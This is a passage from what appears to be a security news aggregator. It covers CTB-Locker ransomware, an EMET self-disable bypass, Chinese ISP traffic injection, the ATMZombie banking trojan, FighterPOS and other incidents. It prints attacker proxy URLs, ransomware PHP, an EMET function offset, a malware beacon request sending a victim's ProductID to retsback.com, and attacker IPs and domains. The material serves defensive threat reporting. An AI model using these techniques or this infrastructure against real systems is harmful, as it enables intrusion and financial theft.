On the main page of the CTB-Locker, attackers are using JQUERY to query proxy servers and verify payments. The following code was found in the page source code and the servers listed on the top are proxies which are used as another layer of protection, instead of the main server of the attackers:

 

Proxy servers which are part of the decryption process:

http://erdeni.ru/access.php
http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware servers are not permanent and are being replaced by new ones every certain period of time. We have identified the threat actor inspecting the server logs and analytics, as sometimes different checks resulted in the server shutting down and turned back on.

Step 3: proxy to C&C

The attackers are utilizing servers which were already attacked to traffic through another layer of protection. On a victim server’s source code, a JavaScript code reveals how the decryption process is sent through three different servers randomly, however those are not the C&C.

 

The above screenshot was taken from the access.php page, supposedly located in each one of the bot servers used as a proxy for the decryption process.

In white block is the actual C&C which has been hardcoded on each of the PHP pages (access.php).

When POST request is being sent with the right parameters, a socket instance is being created and sends a connect beam to the attacker’s C&C server. Later it is being determined if the decryption process succeeded.

Free decrypt

The ransomware allows the victim to freely decrypt not more than two files. It is not for the victim to choose, since the files are pre-chosen and can be found in the malware’s designated file as listed above. The two files are randomly picked during the course of the encryption process.

The following image is an illustration of the free decrypt module:

 

In order to decrypt the two free files, the victim is required to enter the secret_ file name. Once you click the DECRYPT IT FREE button, the client-side script builds a POST request and sends it to one of the C&C servers. We were able to imitate the PHP calculation and run the exit() function of the free decryption routine:

 

The following is the PHP code at the back-end. The function secret_ok() verifies the identity of the victim, based on his domain name and other indicators:

if (isset($_GET[‘dectest’]) && secret_ok()) {
decrypt_files(‘test.txt’, $_GET[‘dectest’]);
exit(‘Congratulations! TEST FILES WAS DECRYPTED!!’);
}
1
2
3
4
if (isset($_GET[‘dectest’]) && secret_ok()) {
decrypt_files(‘test.txt’, $_GET[‘dectest’]);
exit(‘Congratulations! TEST FILES WAS DECRYPTED!!’);
}
Threat actor’s chat room

The ransomware also includes functionality to communicate with the malware authors. As already said, the victim is required to use the secret_ key in order to open the chat. Without it, the chat will remain unresponsive.

 

We have come to the conclusion that ransomware is the new-generation malware for an attacker interested in financial gain. They are very effective, there is no solid solution against this threat thus far, and they are flexible to attack not only desktop operating systems, but now web servers as well.

We urge anyone to backup all important data; and to be cautious about emails which are not specifically meant for the user, or attractive ads that appear online. In addition, third party software must not be trusted automatically by its hash. This identifier can be changed by an attacker once a server has been compromised. Be sure to use other routine checks to ensure that the software is legitimate.


Apple TV je děravá jako ementál. Odhaleny byly desítky nebezpečných chyb

29.2.2016 Zranitelnosti
Více než šest desítek bezpečnostních trhlin bylo objeveno v multimediálním centru Apple TV. Některé z objevených trhlin mohli počítačoví piráti zneužít k průniku do zmiňovaného zařízení. Opravy trhlin jsou však již k dispozici.
Nebezpečné chyby se týkají multimediálních center, ve kterých běží starší operační systém tvOS, než je verze 7.2.1. Právě toto vydání obsahuje záplaty pro všechny odhalené zranitelnosti.

Trhliny se týkaly takřka dvou desítek předinstalovaných aplikací, ale například i samotného jádra této televizní platformy, uvedl server Security Week.

Piráti mohli uživatele klidně i odposlouchávat, aniž by si toho všiml
Chyby mohli kybernetičtí nájezdníci zneužít k tomu, aby se dostali k uloženým citlivým informacím, aby způsobili pád určitých aplikací, případně aby spustili libovolný škodlivý kód. To jinými slovy znamená, že mohli uživatele klidně i odposlouchávat, aniž by si toho všiml.

Žádné zneužití chyb ze strany počítačových pirátů však zatím nebylo prokázáno. Přesto bezpečnostní experti upozorňují, že riziko nebylo malé.

Aktualizace přišly až po roce
Problém byl podle bezpečnostních expertů především v tom, že Apple nezáplatoval nebezpečné díry průběžně.

Předchozí verze vyšla loni v dubnu, tedy v podstatě téměř před rokem. Proti tomu například aktualizace pro iPhony a iPady jsou vydávány skoro každý měsíc. Kyberzločinci díky tomu nemají tolik času si systém pořádně „proklepnout“.

Apple TV je v podstatě malá krabička, která je vybavena wi-fi modulem, ethernetovým portem a HDMI výstupem. U televizoru nahrazuje funkce multimediálního centra, do nejnovější verze je ale navíc možné instalovat i aplikace. Nechybí v ní ani virtuální asistentka Siri.


Using the Microsoft EMET security tool to hack itself
29.2.2016 Security

The security researchers at FireEye Abdulellah Alsaheel and Raghav Pande have found a way to exploit Microsoft EMET (Enhanced Mitigation Experience Toolkit) to hack itself.
The security researchers at FireEye security Abdulellah Alsaheel and Raghav Pande have found a way to exploit the Microsoft security tool Enhanced Mitigation Experience Toolkit to hack itself. The Enhanced Mitigation Experience Toolkit was introduced by Microsoft to raise the cost of exploit development, it cannot be considered a solution that is able to protect systems from any malicious exploit.

The experts elaborated a technique to disable the Microsoft Enhanced Mitigation Experience Toolkit using the tool itself.

 

The Enhanced Mitigation Experience Toolkit was designed to protect systems against attackers by identifying patterns of cyber attacks.

“EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and helps protect by diverting, terminating, blocking, and invalidating those actions and techniques. EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software.” is the description provided by Microsoft for its tool.

The Enhanced Mitigation Experience Toolkit works by injecting anti-malware library in into applications in the attempt of early detect any suspicious activity by hooking process in execution and analyzing any calls in critical APIs .

“EMET injects emet.dll or emet64.dll (depending upon the architecture) into every protected process, which installs Windows API hooks (exported functions by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks provide EMET the ability to analyze any code calls in critical APIs and determine if they are legitimate. If code is deemed to be legitimate, EMET hooking code jumps back into the requested API. Otherwise it triggers an exception.” wrote the security duo.

The researchers focused their efforts in disabling the Enhanced Mitigation Experience Toolkit, this means that an attacker could include in his application the code that invokes a function within the tool that disable it.

The exit “feature” is implemented in the emet.dll for cleanly exiting from a process.

“However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.”

The unique problem for the researchers was to retrieve the base address of emet.dll to invoke the function to arrest it. The experts used the GetModuleHandleW function that is not hooked by the Microsoft Enhanced Mitigation Experience Toolkit to retrieve the address.

This is not the first time that security experts find a way to bypass the Enhanced Mitigation Experience Toolkit, but differently from the past, the technique proposed by the duo doesn’t rely on vulnerabilities or missing features.

“This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is exported, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).” explained the security duo.


Chinese ISPs are redirecting users legitimate traffic to malicious sites/ads

29.2.2016 Virus

Chinese ISPs (internet service providers) are redirecting users legitimate traffic to malicious websites serving malware and ads.
China is know to be not very “ortodox” when talking about freedom on the internet, over the time, it developed numerous projects to monitor users’ activity. The Great Firewall

Now three Israeli researchers uncovered that Chinese ISPs (China Telecom and China Unicom) are injecting content into the users’ traffic.

The way these two Chinese ISPs pollute their client’s network was by setting up proxy servers that lead clients in advertisement links and malware.

When a user access a domain that is under one of these Chinese ISP’s, the altered packet redirects the users browser to parse the rogue network routes. The result is that the initial traffic will be redirected to malicious sites serving adversities and malware.

In their paper, the researchers detailed the tactics used to conduct such kind of attacks and how the IPSs monitor the network traffic for specific URLs altering the traffic.

 

The ISPs are using two injection techniques, the first one called Out of Band TCP Injection and the second its HTTP Injection.

In the Out of Band TCP Injection, the network operators send a forged packet without dropping the legitimate ones, this means that the ISP clones the legitimate traffic and send both legitimate and cloned traffic to the final destination.

The destination receives two traffic stream coming from the same source, the legit and the cloned one, but only one can arrive first, if the legit one wins the race nothing will happen and the users will be fine, but if the cloned one wins the race the user will be in serious problems.

The HTTP Injection works injecting false HTTP responses into the web client. The HTTP is a stateless client-server protocol that uses TCP as its transport.

An HTTP exchange begins by a client sending an HTTP request, usually to retrieve a resource indicated by a URI included in the request. After processing the request, the server sends an HTTP response with a status code. The user might get the following responses:

200 (Successful): The request was successfully received, understood, and accepted. Responses of this type will usually contain the requested resource.
302 (Redirection): The requested resource resides temporarily under a different URI. Responses of this type include a Location header field containing the different URI.
“An HTTP client will receive only one HTTP response for a given request even when a false HTTP response is injected because, as mentioned above, the TCP layer will only accept the first segment that it receive.”

The researchers collected evidence to discover the threat actor behind the forged packets.

They discovered a sort of dirty alliance between advertising sites and ISPs that working together can generate huge amounts of advertisement revenue and divide the profit.

During the investigation, the researchers detected massive amounts of traffic being redirected based on this partnership.

Even though this is happening in China, all users in the world can be affected by it, simply because if you want to access to websites hosted in China you will need to pass through Chinese ISPs before arriving the website, and you will have your traffic susceptible to be injected with ads or malware.

 

How to detect traffic changed/cloned by the Chinese ISPs?

IP identification

A forged packet is masqueraded as a legit packet but can be discovered by the time stamp in each packet, providing an evidence of being a rogue packet.

“We formulate the following rule to determine which of the two raced packets is the forged one: the forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets (except the raced one).”

TTL (Total Time to Live)

“The IP TTL value in a received packet is dependent on the initial value set by the sender and the number of hops the packet has traversed so far. Thus, it is unusual for packets of the same session to arrive at the client with different TTL values. Therefore, if the raced packets have different TTL values we can use them to distinguish between the two packets. From our observations, the injecting entity often made no attempt to make the TTL value of the forged packet similar to the TTL values of the other packets sent by the server. Similarly to the case of the IP identification rule above, we identify the forged packet using the following rule: the forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets. (except the raced one).”

Timing Analysis

“The race between the forged and legitimate packets can also be characterized by the difference in their arrival times. By arrival time we mean the time at which the packet was captured by the monitoring system. Since the system captures traffic at the entrance to the edge network close to the client, it is reasonable to assume that these times are very close to the actual arrival times at the end client. For each injection event we calculatethe difference between the arrival time of the legitimate packet and the arrival time of the forged packet. A negative difference means that the forged packet “won” the race, and a positive difference means that the legitimate packet “won”.”

How to mitigate the risk?

The best way to avoid this kind of attacks is to access websites supporting HTTPS, because in generally the malicious URLs are not SSL Shield, therefore the use of HTTPS by a website can block this type of attack.


ATMZombie: banking trojan in Israeli waters
29.2.2016 Zdroj: Kaspersky Virus

On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. It uses insidious injection and other sophisticated and stealthy methods. The first method, dubbed “proxy-changing”, is commonly used for HTTP packets inspections. It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.

Although this is efficient for testing, streaming bank details isn’t as easy. Banks are using encrypted channels, signed with authorized certificates, to prevent the data from being streamed in clear-text. The attackers, however, realized the missing piece and have since issued a certificate of their own, which is embedded in the dropper and is inserted in the root CA list of common browsers in the victim’s machine.

The method of using a “proxy-changer” Trojan to steal bank credentials has been around since the end of 2005, and is being actively used by Brazilian cybercriminals; however, it wasn’t until 2012 that Kaspersky Lab researchers compiled a full attack analysis. “In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.“, said Fabio Assolini, Senior Security Researcher at GReAT Kaspersky Lab, in his article.

 

A Kaspersky Lab researcher based in Russia had written about similar Trojan attacking PSB-retail customers, dubbed Tochechnyj Banker. It was even backed by a victim case study, where the victim explains how the crocks fooled him into handing out his credentials.

The incident Israeli banks experienced had the same characteristics, but had a very fascinating and innovative method of stealing the money. Instead of relying only on direct wire-transfer or trading credentials, their modus operandi started by leveraging a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM, assisting money mules (zombies) who are suspected to have no awareness of how the attack works; hence the Trojan was dubbed – ATMZombie.

 

The threat actor seems to be widely active in banking malware campaigns, as he was found to be registering domains for the following Trojans as well: Corebot, Pkybot and the recent AndroidLocker. However, none uses the same modus operandi. In addition, the actor is being tracked by a number of researchers and also runs rogue online services such as malware encryption and credit card dumps for sale.

Similar to the PSB-retail attack in 2012, the Retefe Banking Trojan, discovered by PaloAlto Networks last August, is quite like a big brother of ATMZombie. It contains an additional Smoke Loader backdoor, which ATMZombie lacks. The other similar banker is that identified by IBM Trusteer’s as Tsukuba.

The proxy configurations file must specifically detail the targets it is aiming at, thus it was fairly easy to spot them. The attack had successfully compromised hundreds of victim machines; however Kaspersky Lab was able to trace only a couple of dozen of them.

Bird view

The Trojan is dropped into the victim machine and starts the unpacking process. Once unpacked it stores certificates in common browsers (Opera, Firefox) and modifies their configurations to match a Man-In-The-Middle attack. It eliminates all possible proxies other than the malware’s and changes cache permissions to read-only. It than continues by changing registry entries with Base64 encoded strings that contain a path to the auto-configuration content (i.e. traffic capture conditions using CAP file syntax) and installs its own signed certificate into the root folder. Later it waits for the victim to login to their bank account and steals their credentials, logs in using their name and exploits the SMS feature to send money to the

Analysis

After loading the malware executable with your favorite assembler level analysis debugger, it is possible to capture the virtual allocation procedure occurring in run-time. Putting breakpoints in the right instruction points will disclose the unpacked executable. Once the final routine is done, the MZ header will appear in memory. There are many techniques and tools, but this method was enough to unpack the malware.

 

Looking into the malware assembly code, we were able to identify a number of strings that were embedded in the data section for a reason. The first we spotted was a Base64 string containing a chunk of an outbound communication URL, meant to be embedded in a number of registry entries.

 

The string decodes to:

http://retsback.com/config/cfg.pac

Side note: It is not the PAC file that is being embedded in the browser network configuration; thus we believe that it was generated by the attacker as a backup, in case the original PAC fails.

 

Two other Base64 strings we found were the PAC, which was embedded in the browser network configuration; and another type of URL, which indicated the type of lateral movement the threat actor chose.

 

The URL in the Base64 string was appended to an HTTP request which was detected as an attempt to fingerprint the sandbox. The empty parameters are fed with the Windows ProductID, the binary’s name and an integer between one and five. The integer is the level of integrity that the malware was assigned for; where (1) is untrusted level and (5) is system level. Along with those three dynamic values is a static version value.

GET
/z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1
Host: retsback.com
Cache-Control: no-cache

Inspecting the binary, we found that it uses a certificate to stream data over HTTPS and securely steal the victim’s credentials.

 

After embedding the above certificate and proxy configurations in the victim’s machine, the browser is set to route the communication via the attackers’ server when the victim decides to login to his bank.

The victim was not only lured into downloading the malware for being a client of Israeli banks, but was also targeted for being a client of a specific bank in Israel. This requires either very good intelligence-gathering techniques or an insider that can, legitimately or not, get a hold of the list of clients. When a list of that nature is being assembled, the hunt becomes very efficient and the attackers are able to craft each email or link to a specific victim or bank.

The following is a full pseudo code of the malware:

 

Stepping out of the rabbit hole

The malware is only the first step of the attack. The second step involves a manual login to the hijacked accounts and submission of a wire-transfer to the account of the money mule. This is a crucial step, since crossing this step means that the malware has successfully finished its role in the attack.

Logging manually into the victim’s bank account is not something to take lightly. Many banks around the world are fingerprinting devices to make sure that the user is logging in from a trusted machine. For untrusted machines, the bank will issue extended protection mechanisms to prevent the exact attack detailed in this article. In addition, banks track anomalies and send alerts to its information security personnel.

 

Before victims get to the phase where they call the bank’s support team to declare that money has gone missing, the attacker issues a money transfer to the money mule’s cell phone number and Israeli Personal Identifiable Information (PII). We dubbed the money mule “Zombie”, as part of an investigation in which he found that youngsters were lured into withdrawing cash from the ATMs, in return for receiving a small amount of it. Later, they sent the rest of the money via different media, such as a post office. The campaign was named after the money mules and the technique they were instructed to use.

The technique allowed the attackers to stay anonymous and supervise the entire campaign remotely. It also points to a new type of attack, where attackers control residents of a country to operate as an insider and deliver a basic service. This service might cause its executor to be accused for committing a crime; however, the chance of proving that they were aware of the entire operation is close to none. After all, they are not doing anything malicious.

From reading the bank’s instruction, a non-registered user can study the five-year old feature and analyze the possibility of including it in the attack as a way to wire money. This feature is called “SMS transaction”; and it has been widely used for the past few years, allowing parents, for example, to send money to kids who have no credit card, while they serve in the military or study at school.

Along with a few more unique details, such as Date, Israeli ID, Name and Amount the owner of the phone will be provided with an SMS message that authorizes the cash withdraw.

Kaspersky Lab found an innovative way to protect against the proxy-changer that has existed for several years. It can be found here.

Israeli banks involved in the incident successfully stopped the attack using, among other data, the information they received from Kaspersky Lab regarding the attacker, the malicious activity and the victims.

FAQs

Q: Was the attack targeted at Israeli banks?

A: Yes

Q: Was money stolen from the banks or from victims’ accounts?

A: The money was stolen from victims’ accounts, but the bank compensated each victim. In conclusion, the bank was the one to lose revenue.

Q: Was the attack stopped completely?

A: As far as we know, the banks were able to stop the attack completely and compensate the victims.

Q: How many victims were in the attack?

A: The Kaspersky Security Network (KSN) showed dozens of victims; however, we estimate that the total number of victims reached a couple of hundreds.

Q: How much money was stolen?

A: The highest amount for one transaction was approximately 750$. We were able to find a number of money mules, about 10 different malicious binaries, and a number of banks who were victims of this attack. With this information we estimate that hundreds of thousands of dollars were stolen in this short period of time. If not for the vast investigation led, among others, by Kaspersky Lab, the amounts stolen could have soared to much larger numbers.

Q: Were the police part of the investigation?

A: We are not aware of any investigation details.

Q: In regards to attribution, who is the attacker?

A: Kaspersky Lab does not seek attribution; however, the company’s researchers have sent all the information to law enforcement to help in catching the criminals behind the campaign.

Q: What can I do to stay protected?

A: Make sure you have anti-malware product installed and install the latest patches.

IPs

91.230.211.206
185.86.77.153
91.215.154.90
88.214.236.121

Domains

retsback.com
updconfs.com
systruster.com
msupdcheck.com

Samples

6d11090c78e6621c21836c98808ff0f4 Trojan-Banker.Win32.Capper.zym
4c5b7a8187475be251d05655edcaccbe Trojan-Banker.Win32.Capper.zyt
c0201ab2a45bc0e17ebd186059d5a59e Trojan-Banker.Win32.Capper.zyk
47b316e3227d618089eb1625c4202142 Trojan-Banker.Win32.Capper.zyl
84bb5a77e28b3539a8022bc3612d4f4c PAC file example
d2bf165284ab1953a96dfa7b642637a8 Trojan-Banker.Win32.Capper.zyp
80440e78a68583b180ad4d3e9a676a6e Trojan-Banker.Win32.Capper.zyq
d08e51f8187df278296a8c4ff5cff0de Trojan-Banker.Win32.Capper.zyg
efa5ea2c511b08d0f8259a10a49b27ad Trojan-Banker.Win32.Capper.zys
13d9352a27b626e501f5889bfd614b34 Trojan-Banker.Win32.Capper.zyf
e5b7fd7eed59340027625ac39bae7c81 Trojan-Banker.Win32.Capper.zyj


The new FighterPOS PoS Malware implements worm capabilities
29.2.2016 Virus

The threat actors behind the FighterPOS PoS malware have added worm capabilities to their malicious code that is now targeting systems in the United States.
PoS malware represents a serious threat to several industries, from retail to the hotel industry. During the last twelve months, security experts have discovered a significant number of payment card frauds involving the PoS malware. PoS malware is a very effective weapon in the arsenal of cyber criminals;

In April 2015, security experts at Trend Micro discovered a new family of PoS malware, dubbed FighterPOS, that infected the systems of more than 100 organizations in Brazil allowing crooks to steal more than 22,000 unique credit card records.

FighterPOS was offered for sale for more than $5,000 worth of Bitcoins, it is now spreading also outside the Brazil, researchers at TrendMicro reported that the number of infections in the US now represents 6 percent of the total, up from 1 percent reported in April 2015.

fighterpos infections

Cyber criminals have started targeting the United States, the researchers detected new samples of the FighterPOS malware that include strings written in English, instead of Portuguese used in Brazil.

“It is also interesting to note that based on the analysis of their code, the new FighterPOS samples have strings of code written in English, instead of Portuguese. This leads us to speculate that whoever is behind the new versions are operating in English-speaking countries, and are shifting to target other countries like the United States. ” states the analysis published by TrendMicro.

The malware researchers discovered two new strains of the FighterPOS malware called TSPY_POSFIGHT.F and WORM_POSFIGHT.SMFLK. The WORM_POSFIGHT.SMFLK, also known as “Floki Intruder,” in more sophisticated respect the TSPY_POSFIGHT.F, it has the ability to the firewall, User Account Control (UAC) and other Windows protections and it is able to detect the presence of security products using Windows Management Instrumentation (WMI).

The lightweight FighterPOS variant, the TSPY_POSFIGHT.F, doesn’t act as a backdoor and is not able to receive commands. It has been designed to send back to C&C the payment card logs collected by other PoS malware.

The Floki Intruder is spread through websites compromised by attackers, it could be updated receiving packages from the command and control (C&C) servers.

The most interesting improvement for the new strain of the FighterPOS malware is the implementations of worm capabilities. The Floki Intruder variant is able to locate other PoS systems on the same network and infect them. The malware enumerates logical drives and drops copies of itself along with

The malware enumerates logical drives and drops copies of itself and an autorun.inf file using the WMI. The autorun.inf allows the execution of the malware when the logical drive is accessed.

fighterpos autorun

“Perhaps the most notable update Floki Intruder has from FighterPOS is that it is able to enumerate logical drives to drop copies of itself and an autorun.inf by using WMI. Adding this routine, in a way, makes sense: given that it is quite common for PoS terminals to be connected in one network, a propagation routine will not only enable the attacker to infect as many terminals as possible with the least amount of effort, it will also make this threat more difficult to remove because reinfection will occur as long as at least one terminal is affected.” states the analysis.


Za ukradená data platí oběti hackerů i miliony dolarů

29.2.2016 Hacking
Pokud by citlivá data firem unikla na internet, mohlo by je to snadno zničit. V minulém roce se mohutně rozšířil nový, znepokojivý trend u kyberútoků: vydírání.

Jen za poslední rok zaplatily některé společnosti přes milion dolarů jako úplatek za mlčení. Kyberútočníci si navykli ukrást citlivá data a hrozit, že je zveřejní online v případě nezaplacení, říká Charles Carmakal, viceprezident skupiny Mandiant, spadající pod protimalwarovou bezpečnostní firmu FireEye.

„Jsme svědky situace, kdy si zloděj úmyslně vybere konkrétní společnost, ukradne její data, zkontroluje je a zná jejich hodnotu,“ pokračuje Carmakal. „Viděli jsme sedmimístné platby od firem, které se bojí uveřejnění svých citlivých údajů.“

Skupina Mandiant ve čtvrteční zprávě zběžně popsala praktiky útočníků, s tím, že manažeři firem jsou někdy hackery dokonce zesměšňováni.

Vydírací útoky jsou ještě sofistikovanější než tzv. ransomware, jako je např. Ctryptolocker: Malware, který zašifruje soubory v počítači a pro jejich zpřístupnění musí majitel zaplatit danou cenu v bitcoinech.

Ač ransomware útoky mohou být zdrcující ve své přímočarosti, obvykle je nutno zaplatit „pouze“ několik stovek dolarů. I tak se ovšem několikrát povedlo hackerům získat vyšší částky.

Součásné vyděračské útoky jsou však mnohem propracovanější a mohou být velice nebezpečné, obzvláště pro velké firmy. Carmakal soudí, že pokud by hackeři zveřejnili některé z ukradených dat, mohli by společnost zcela vyřadit ze hry.

„Realita je, že hodně lidí zaplatí,“ říká.

Pro skupinu jako Mandiant, která zkoumala velké úniky dat u společností jako Target, Home Depot nebo Anthem, může být dost těžké firmám poradit, co v dané situaci udělat, pokračuje Carmakal.

Útočníci často nedávají dostatek času, aby se ověřilo, jestli hackeři blafují, nebo ne. A jsou tací, kteří ve skutečnosti daná data nemají a jen takto shání peníze.

„Co potřebujeme je důkaz, že někdo skutečně má přístup k těm datům,“ říká Carmakal. „Přesvědčíme je, aby nám poslali vzorek, nebo provedeme co nejrychlejší možné vyšetřování.“

Pokud skupina odhalí, že někdo skutečně slídil okolo a s největší pravděpodobností data má, přichází velice těžké a složité rozhodnutí: Protože i když firma zaplatí, nikdo negarantuje, že útočníci přesto data nevypustí do světa.

„Rozhodně existuje riziko v nezaplacení, ovšem stejně tak riziko v zaplacení,“ dodává Carmakal. „Cíl každého je, že firma zaplatí a útočníci smažou ukradená data; ale to, že tak skutečně učinili, vám nikdo nepotvrdí.“


A journalist has been hacked on a plane while writing an Apple-FBI story

29.2.2016 Apple

The journalist Steven Petrow had his computer hacked while on a plane, it was a shocking experience that raises the discussion on privacy.
Experts in the aviation industry are spending a significant effort in the attempt of improving cyber security. The news that I’m going to tell you has something of incredible.

The American journalist and author Steven Petrow, who is now writing for USA Today explained that he was contacted by a fellow passenger on an American Airline flight from North Carolina to Dallas, who told him that he accessed his email account.

American-Airlines privacy hacking

“I don’t really need to worry about online privacy,” wrote Petrow. “I’ve got nothing to hide. And who would want to know what I’m up to, anyway?

Petrow is a journalist, not an investigative reporter and is not involved in any specific investigation, so the interest of the alleged hacker appeared very strange to him.

Petrow was writing an article on the “Apple vs FBI” case while he was on the plane, but another passenger was well informed about the work of the journalist.

After the plane landed, the journalist was leaving the plane when a fellow in the same row asked to speak with him.

“I need to talk to you.” the man said. “You’re a reporter, right?” “Wait for me at the gate.”

The journalist waited for the fellow passenger and when met him at the gate asked to explain.

“How did you know I was a reporter?” the journalists asked.

“Are you interested in the Apple/FBI story?” replied the man ignoring the question,

“I hacked your email on the plane and read everything you sent and received. I did it to most people on the flight.”

As a proof of the hack, the fellow passenger cited the exact content of one the mail he received while in flight.

“One of my emails was pretty explicit about the focus of my story and I had emailed Bruce Schneier, a security expert who had previously written in the Washington Post about this very issue.” wrote Petrow.

During the flight, Petrow worked on the article and sent and received several email messages through the American Airlines Gogo in-flight Internet connection.

The Gogo wireless is American Airlines free internet service provided to passengers. When passengers use it are advised to avoid transmitting sensitive data, but most of the passengers still ignore the risks.

The Gogo service operates in the same ways as most open Wi-Fi hotspots, this means that is important avoid sharing sensitive data while accessing it. on the ground.

Gogo recommends the use of a virtual private network for sending sensitive data, but of course, the journalist ignored this best practice.

The fellow passenger explained the journalist the risks for connecting to open networks.

“That’s how I know you’re interested in the Apple story,” he continued. “Imagine if you had been doing a financial transaction. What if you were making a date to see a whore?”

“That’s why this story is so important to everyone,” he told Petrow. “It’s about everyone’s privacy.”

The man then went away, but the event upset the reporter. His privacy had been violated, the same that happens every day to millions of unaware users.s

“For me, I felt as though the stranger on the plane had robbed me of my privacy—as was explicitly his intent. He took the decision of what to share out of my hands. He went in through the back door of the Gogo connection.


A DHS report confirms the use of BlackEnergy in the Ukrainian outage, still unknown its role
28.2.2016 Hacking

A report issued by the DHS CERT confirms that the outage in Ukraine was caused by a well-coordinated attack still unclear the BlackEnergy role.
In December, a major outage hit a region in Ukraine, more than 225,000 customers were affected by the interruption of the electricity. Security experts speculate the involvement of Russian nation-state actors that have used the BlackEnergy to infect SCADA systems of Ukrainian grid and critical infrastrcuture.

According to a Ukrainian media TSN, the power outage was caused by the destructive malware that disconnected electrical substations. The experts speculate that hackers run a spear phishing campaign across the Ukrainian power authorities to spread the BlackEnergy malware leveraging on Microsoft Office documents.

Now a new report published by the DHS Industrial Control Systems Cyber Emergency Response Team confirms that the outage was caused by a cyber attack.

The report is based on interviews with operations and IT staff at six Ukrainian organizations involved in the attacks. The thesis has been supported first by the SANS industrial control systems team, but it is still unclear the real impact of the BlackEnergy malware of the incident.

The SANS report reported that attackers flooded the call centers at the power authorities with phone calls, the intent of the attackers was to prevent customers from reporting the incident to the companies operating the critical infrastructure.

The DHS report highlights the possibility that the two strains of malware were used by the attackers after the outage in an attempt either to destroy evidence the intrusion or make recovery more difficult.

“Following these discussions and interviews, the team assesses that the outages experienced on December 23, 2015, were caused by external cyber-attackers. The team was not able to independently review technical evidence of the cyber-attack; however, a significant number of independent reports from the team’s interviews as well as documentary findings corroborate the events as outlined below.” states the report.

“Through interviews with impacted entities, the team learned that power outages were caused by remote cyber intrusions at three regional electric power distribution companies (Oblenergos) impacting approximately 225,000 customers.”

“The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.

All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. In addition, the actors reportedly scheduled disconnects for server Uninterruptable Power Supplies (UPS) via the UPS remote management interface. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts.”

The report confirmed that every company victim of the attack was infected with the BlackEnergy malware, but avoided to provide further details on the role played by the malware.

“Each company also reported that they had been infected with BlackEnergy malware; however, we do not know whether the malware played a role in the cyber-attacks. The malware was reportedly delivered via spear phishing emails with malicious Microsoft Office attachments. It is suspected that BlackEnergy may have been used as an initial access vector to acquire legitimate credentials; however, this information is still being evaluated. It is important to underscore that any remote access Trojan could have been used and none of BlackEnergy’s specific capabilities were reportedly leveraged.”


German authorities approve the use of home-made Federal Trojan
28.2.2016 Virus

The German Interior Ministry has approved the use of a federal Trojan developed by the German Federal Criminal Police.
The German Interior Ministry has approved the use a spyware developed by the German Federal Criminal Police, aka the ‘federal Trojan’ or Bundestrojaner, for the investigative purpose.

“Soon the state could re-enter the computer of suspicious citizens. The Bundeskriminalamt has had to develop their own Trojan horse that should receive the application approval in the coming weeks, as the Germany radio has been confirmed. The Chaos Computer Club and Green remain skeptical whether the new software meets the requirements of the Federal Constitutional Court.” reports the Deutschlandfunk.

The German Federal Criminal Police completed the development of the malware in autumn 2015, it allows investigators to spy on suspects’ phone calls, emails, chats, and access files and sensitive data stored on the mobile devices. The federal Trojan is also able to record video or audio from the surrounding environment.

The authorities can now use the federal Trojan under a court order, the spyware could be used in any investigation on individuals involved in a crime threatening citizens’ “life, limb or liberty.”

Experts from the German Chaos Computer Club (CCC) expressed their concern for the Federal Trojan, Frank Rieger, a spokesman for the organizations, highlights the abilities of the malware of setting up a video or audio surveillance.

In 2011, the experts at Chaos Computer Club analyzed another sample of the Federal Trojan. The experts discovered that the spyware had the ability to set up a backdoor on the suspect’s machine and spy on surround environment via camera and microphone. The ministers of several German states admitted the use of the malware and explained that the malware analyzed by the CCC was a beta version of a spyware created by the German firm DigiTask. The spyware was rejected by authorities because it implemented many surveillance operations instead the only telecommunication surveillance.

The experts at CCC speculates that the so-called Federal Trojan is dangerous for citizens, in fact, it could be easy that also innocent users fall victims of the surveillance activities operated by the authorities.

Another aspect highlighted by privacy advocates is the way such kind of malware is developed, the authors of the spyware need to access zero-day exploit to compromise suspects’ devices, but this implies that authorities will not share such knowledge within the IT community putting citizens at risk.

The Deutschlandfunk also confirmed that German police also use other spyware, including the infamous FinFisher malware developed by Gamma International.

“The Bundeskriminalamt had a software ordered parallel to the self-development even in a controversial company to source telecommunication surveillance. According to the BKA, the adaptation of the product is FinFisher the German-British company Elaman / Gamma International is not yet complete, however, is to be promoted following the own development.” states Deutschlandfunk.


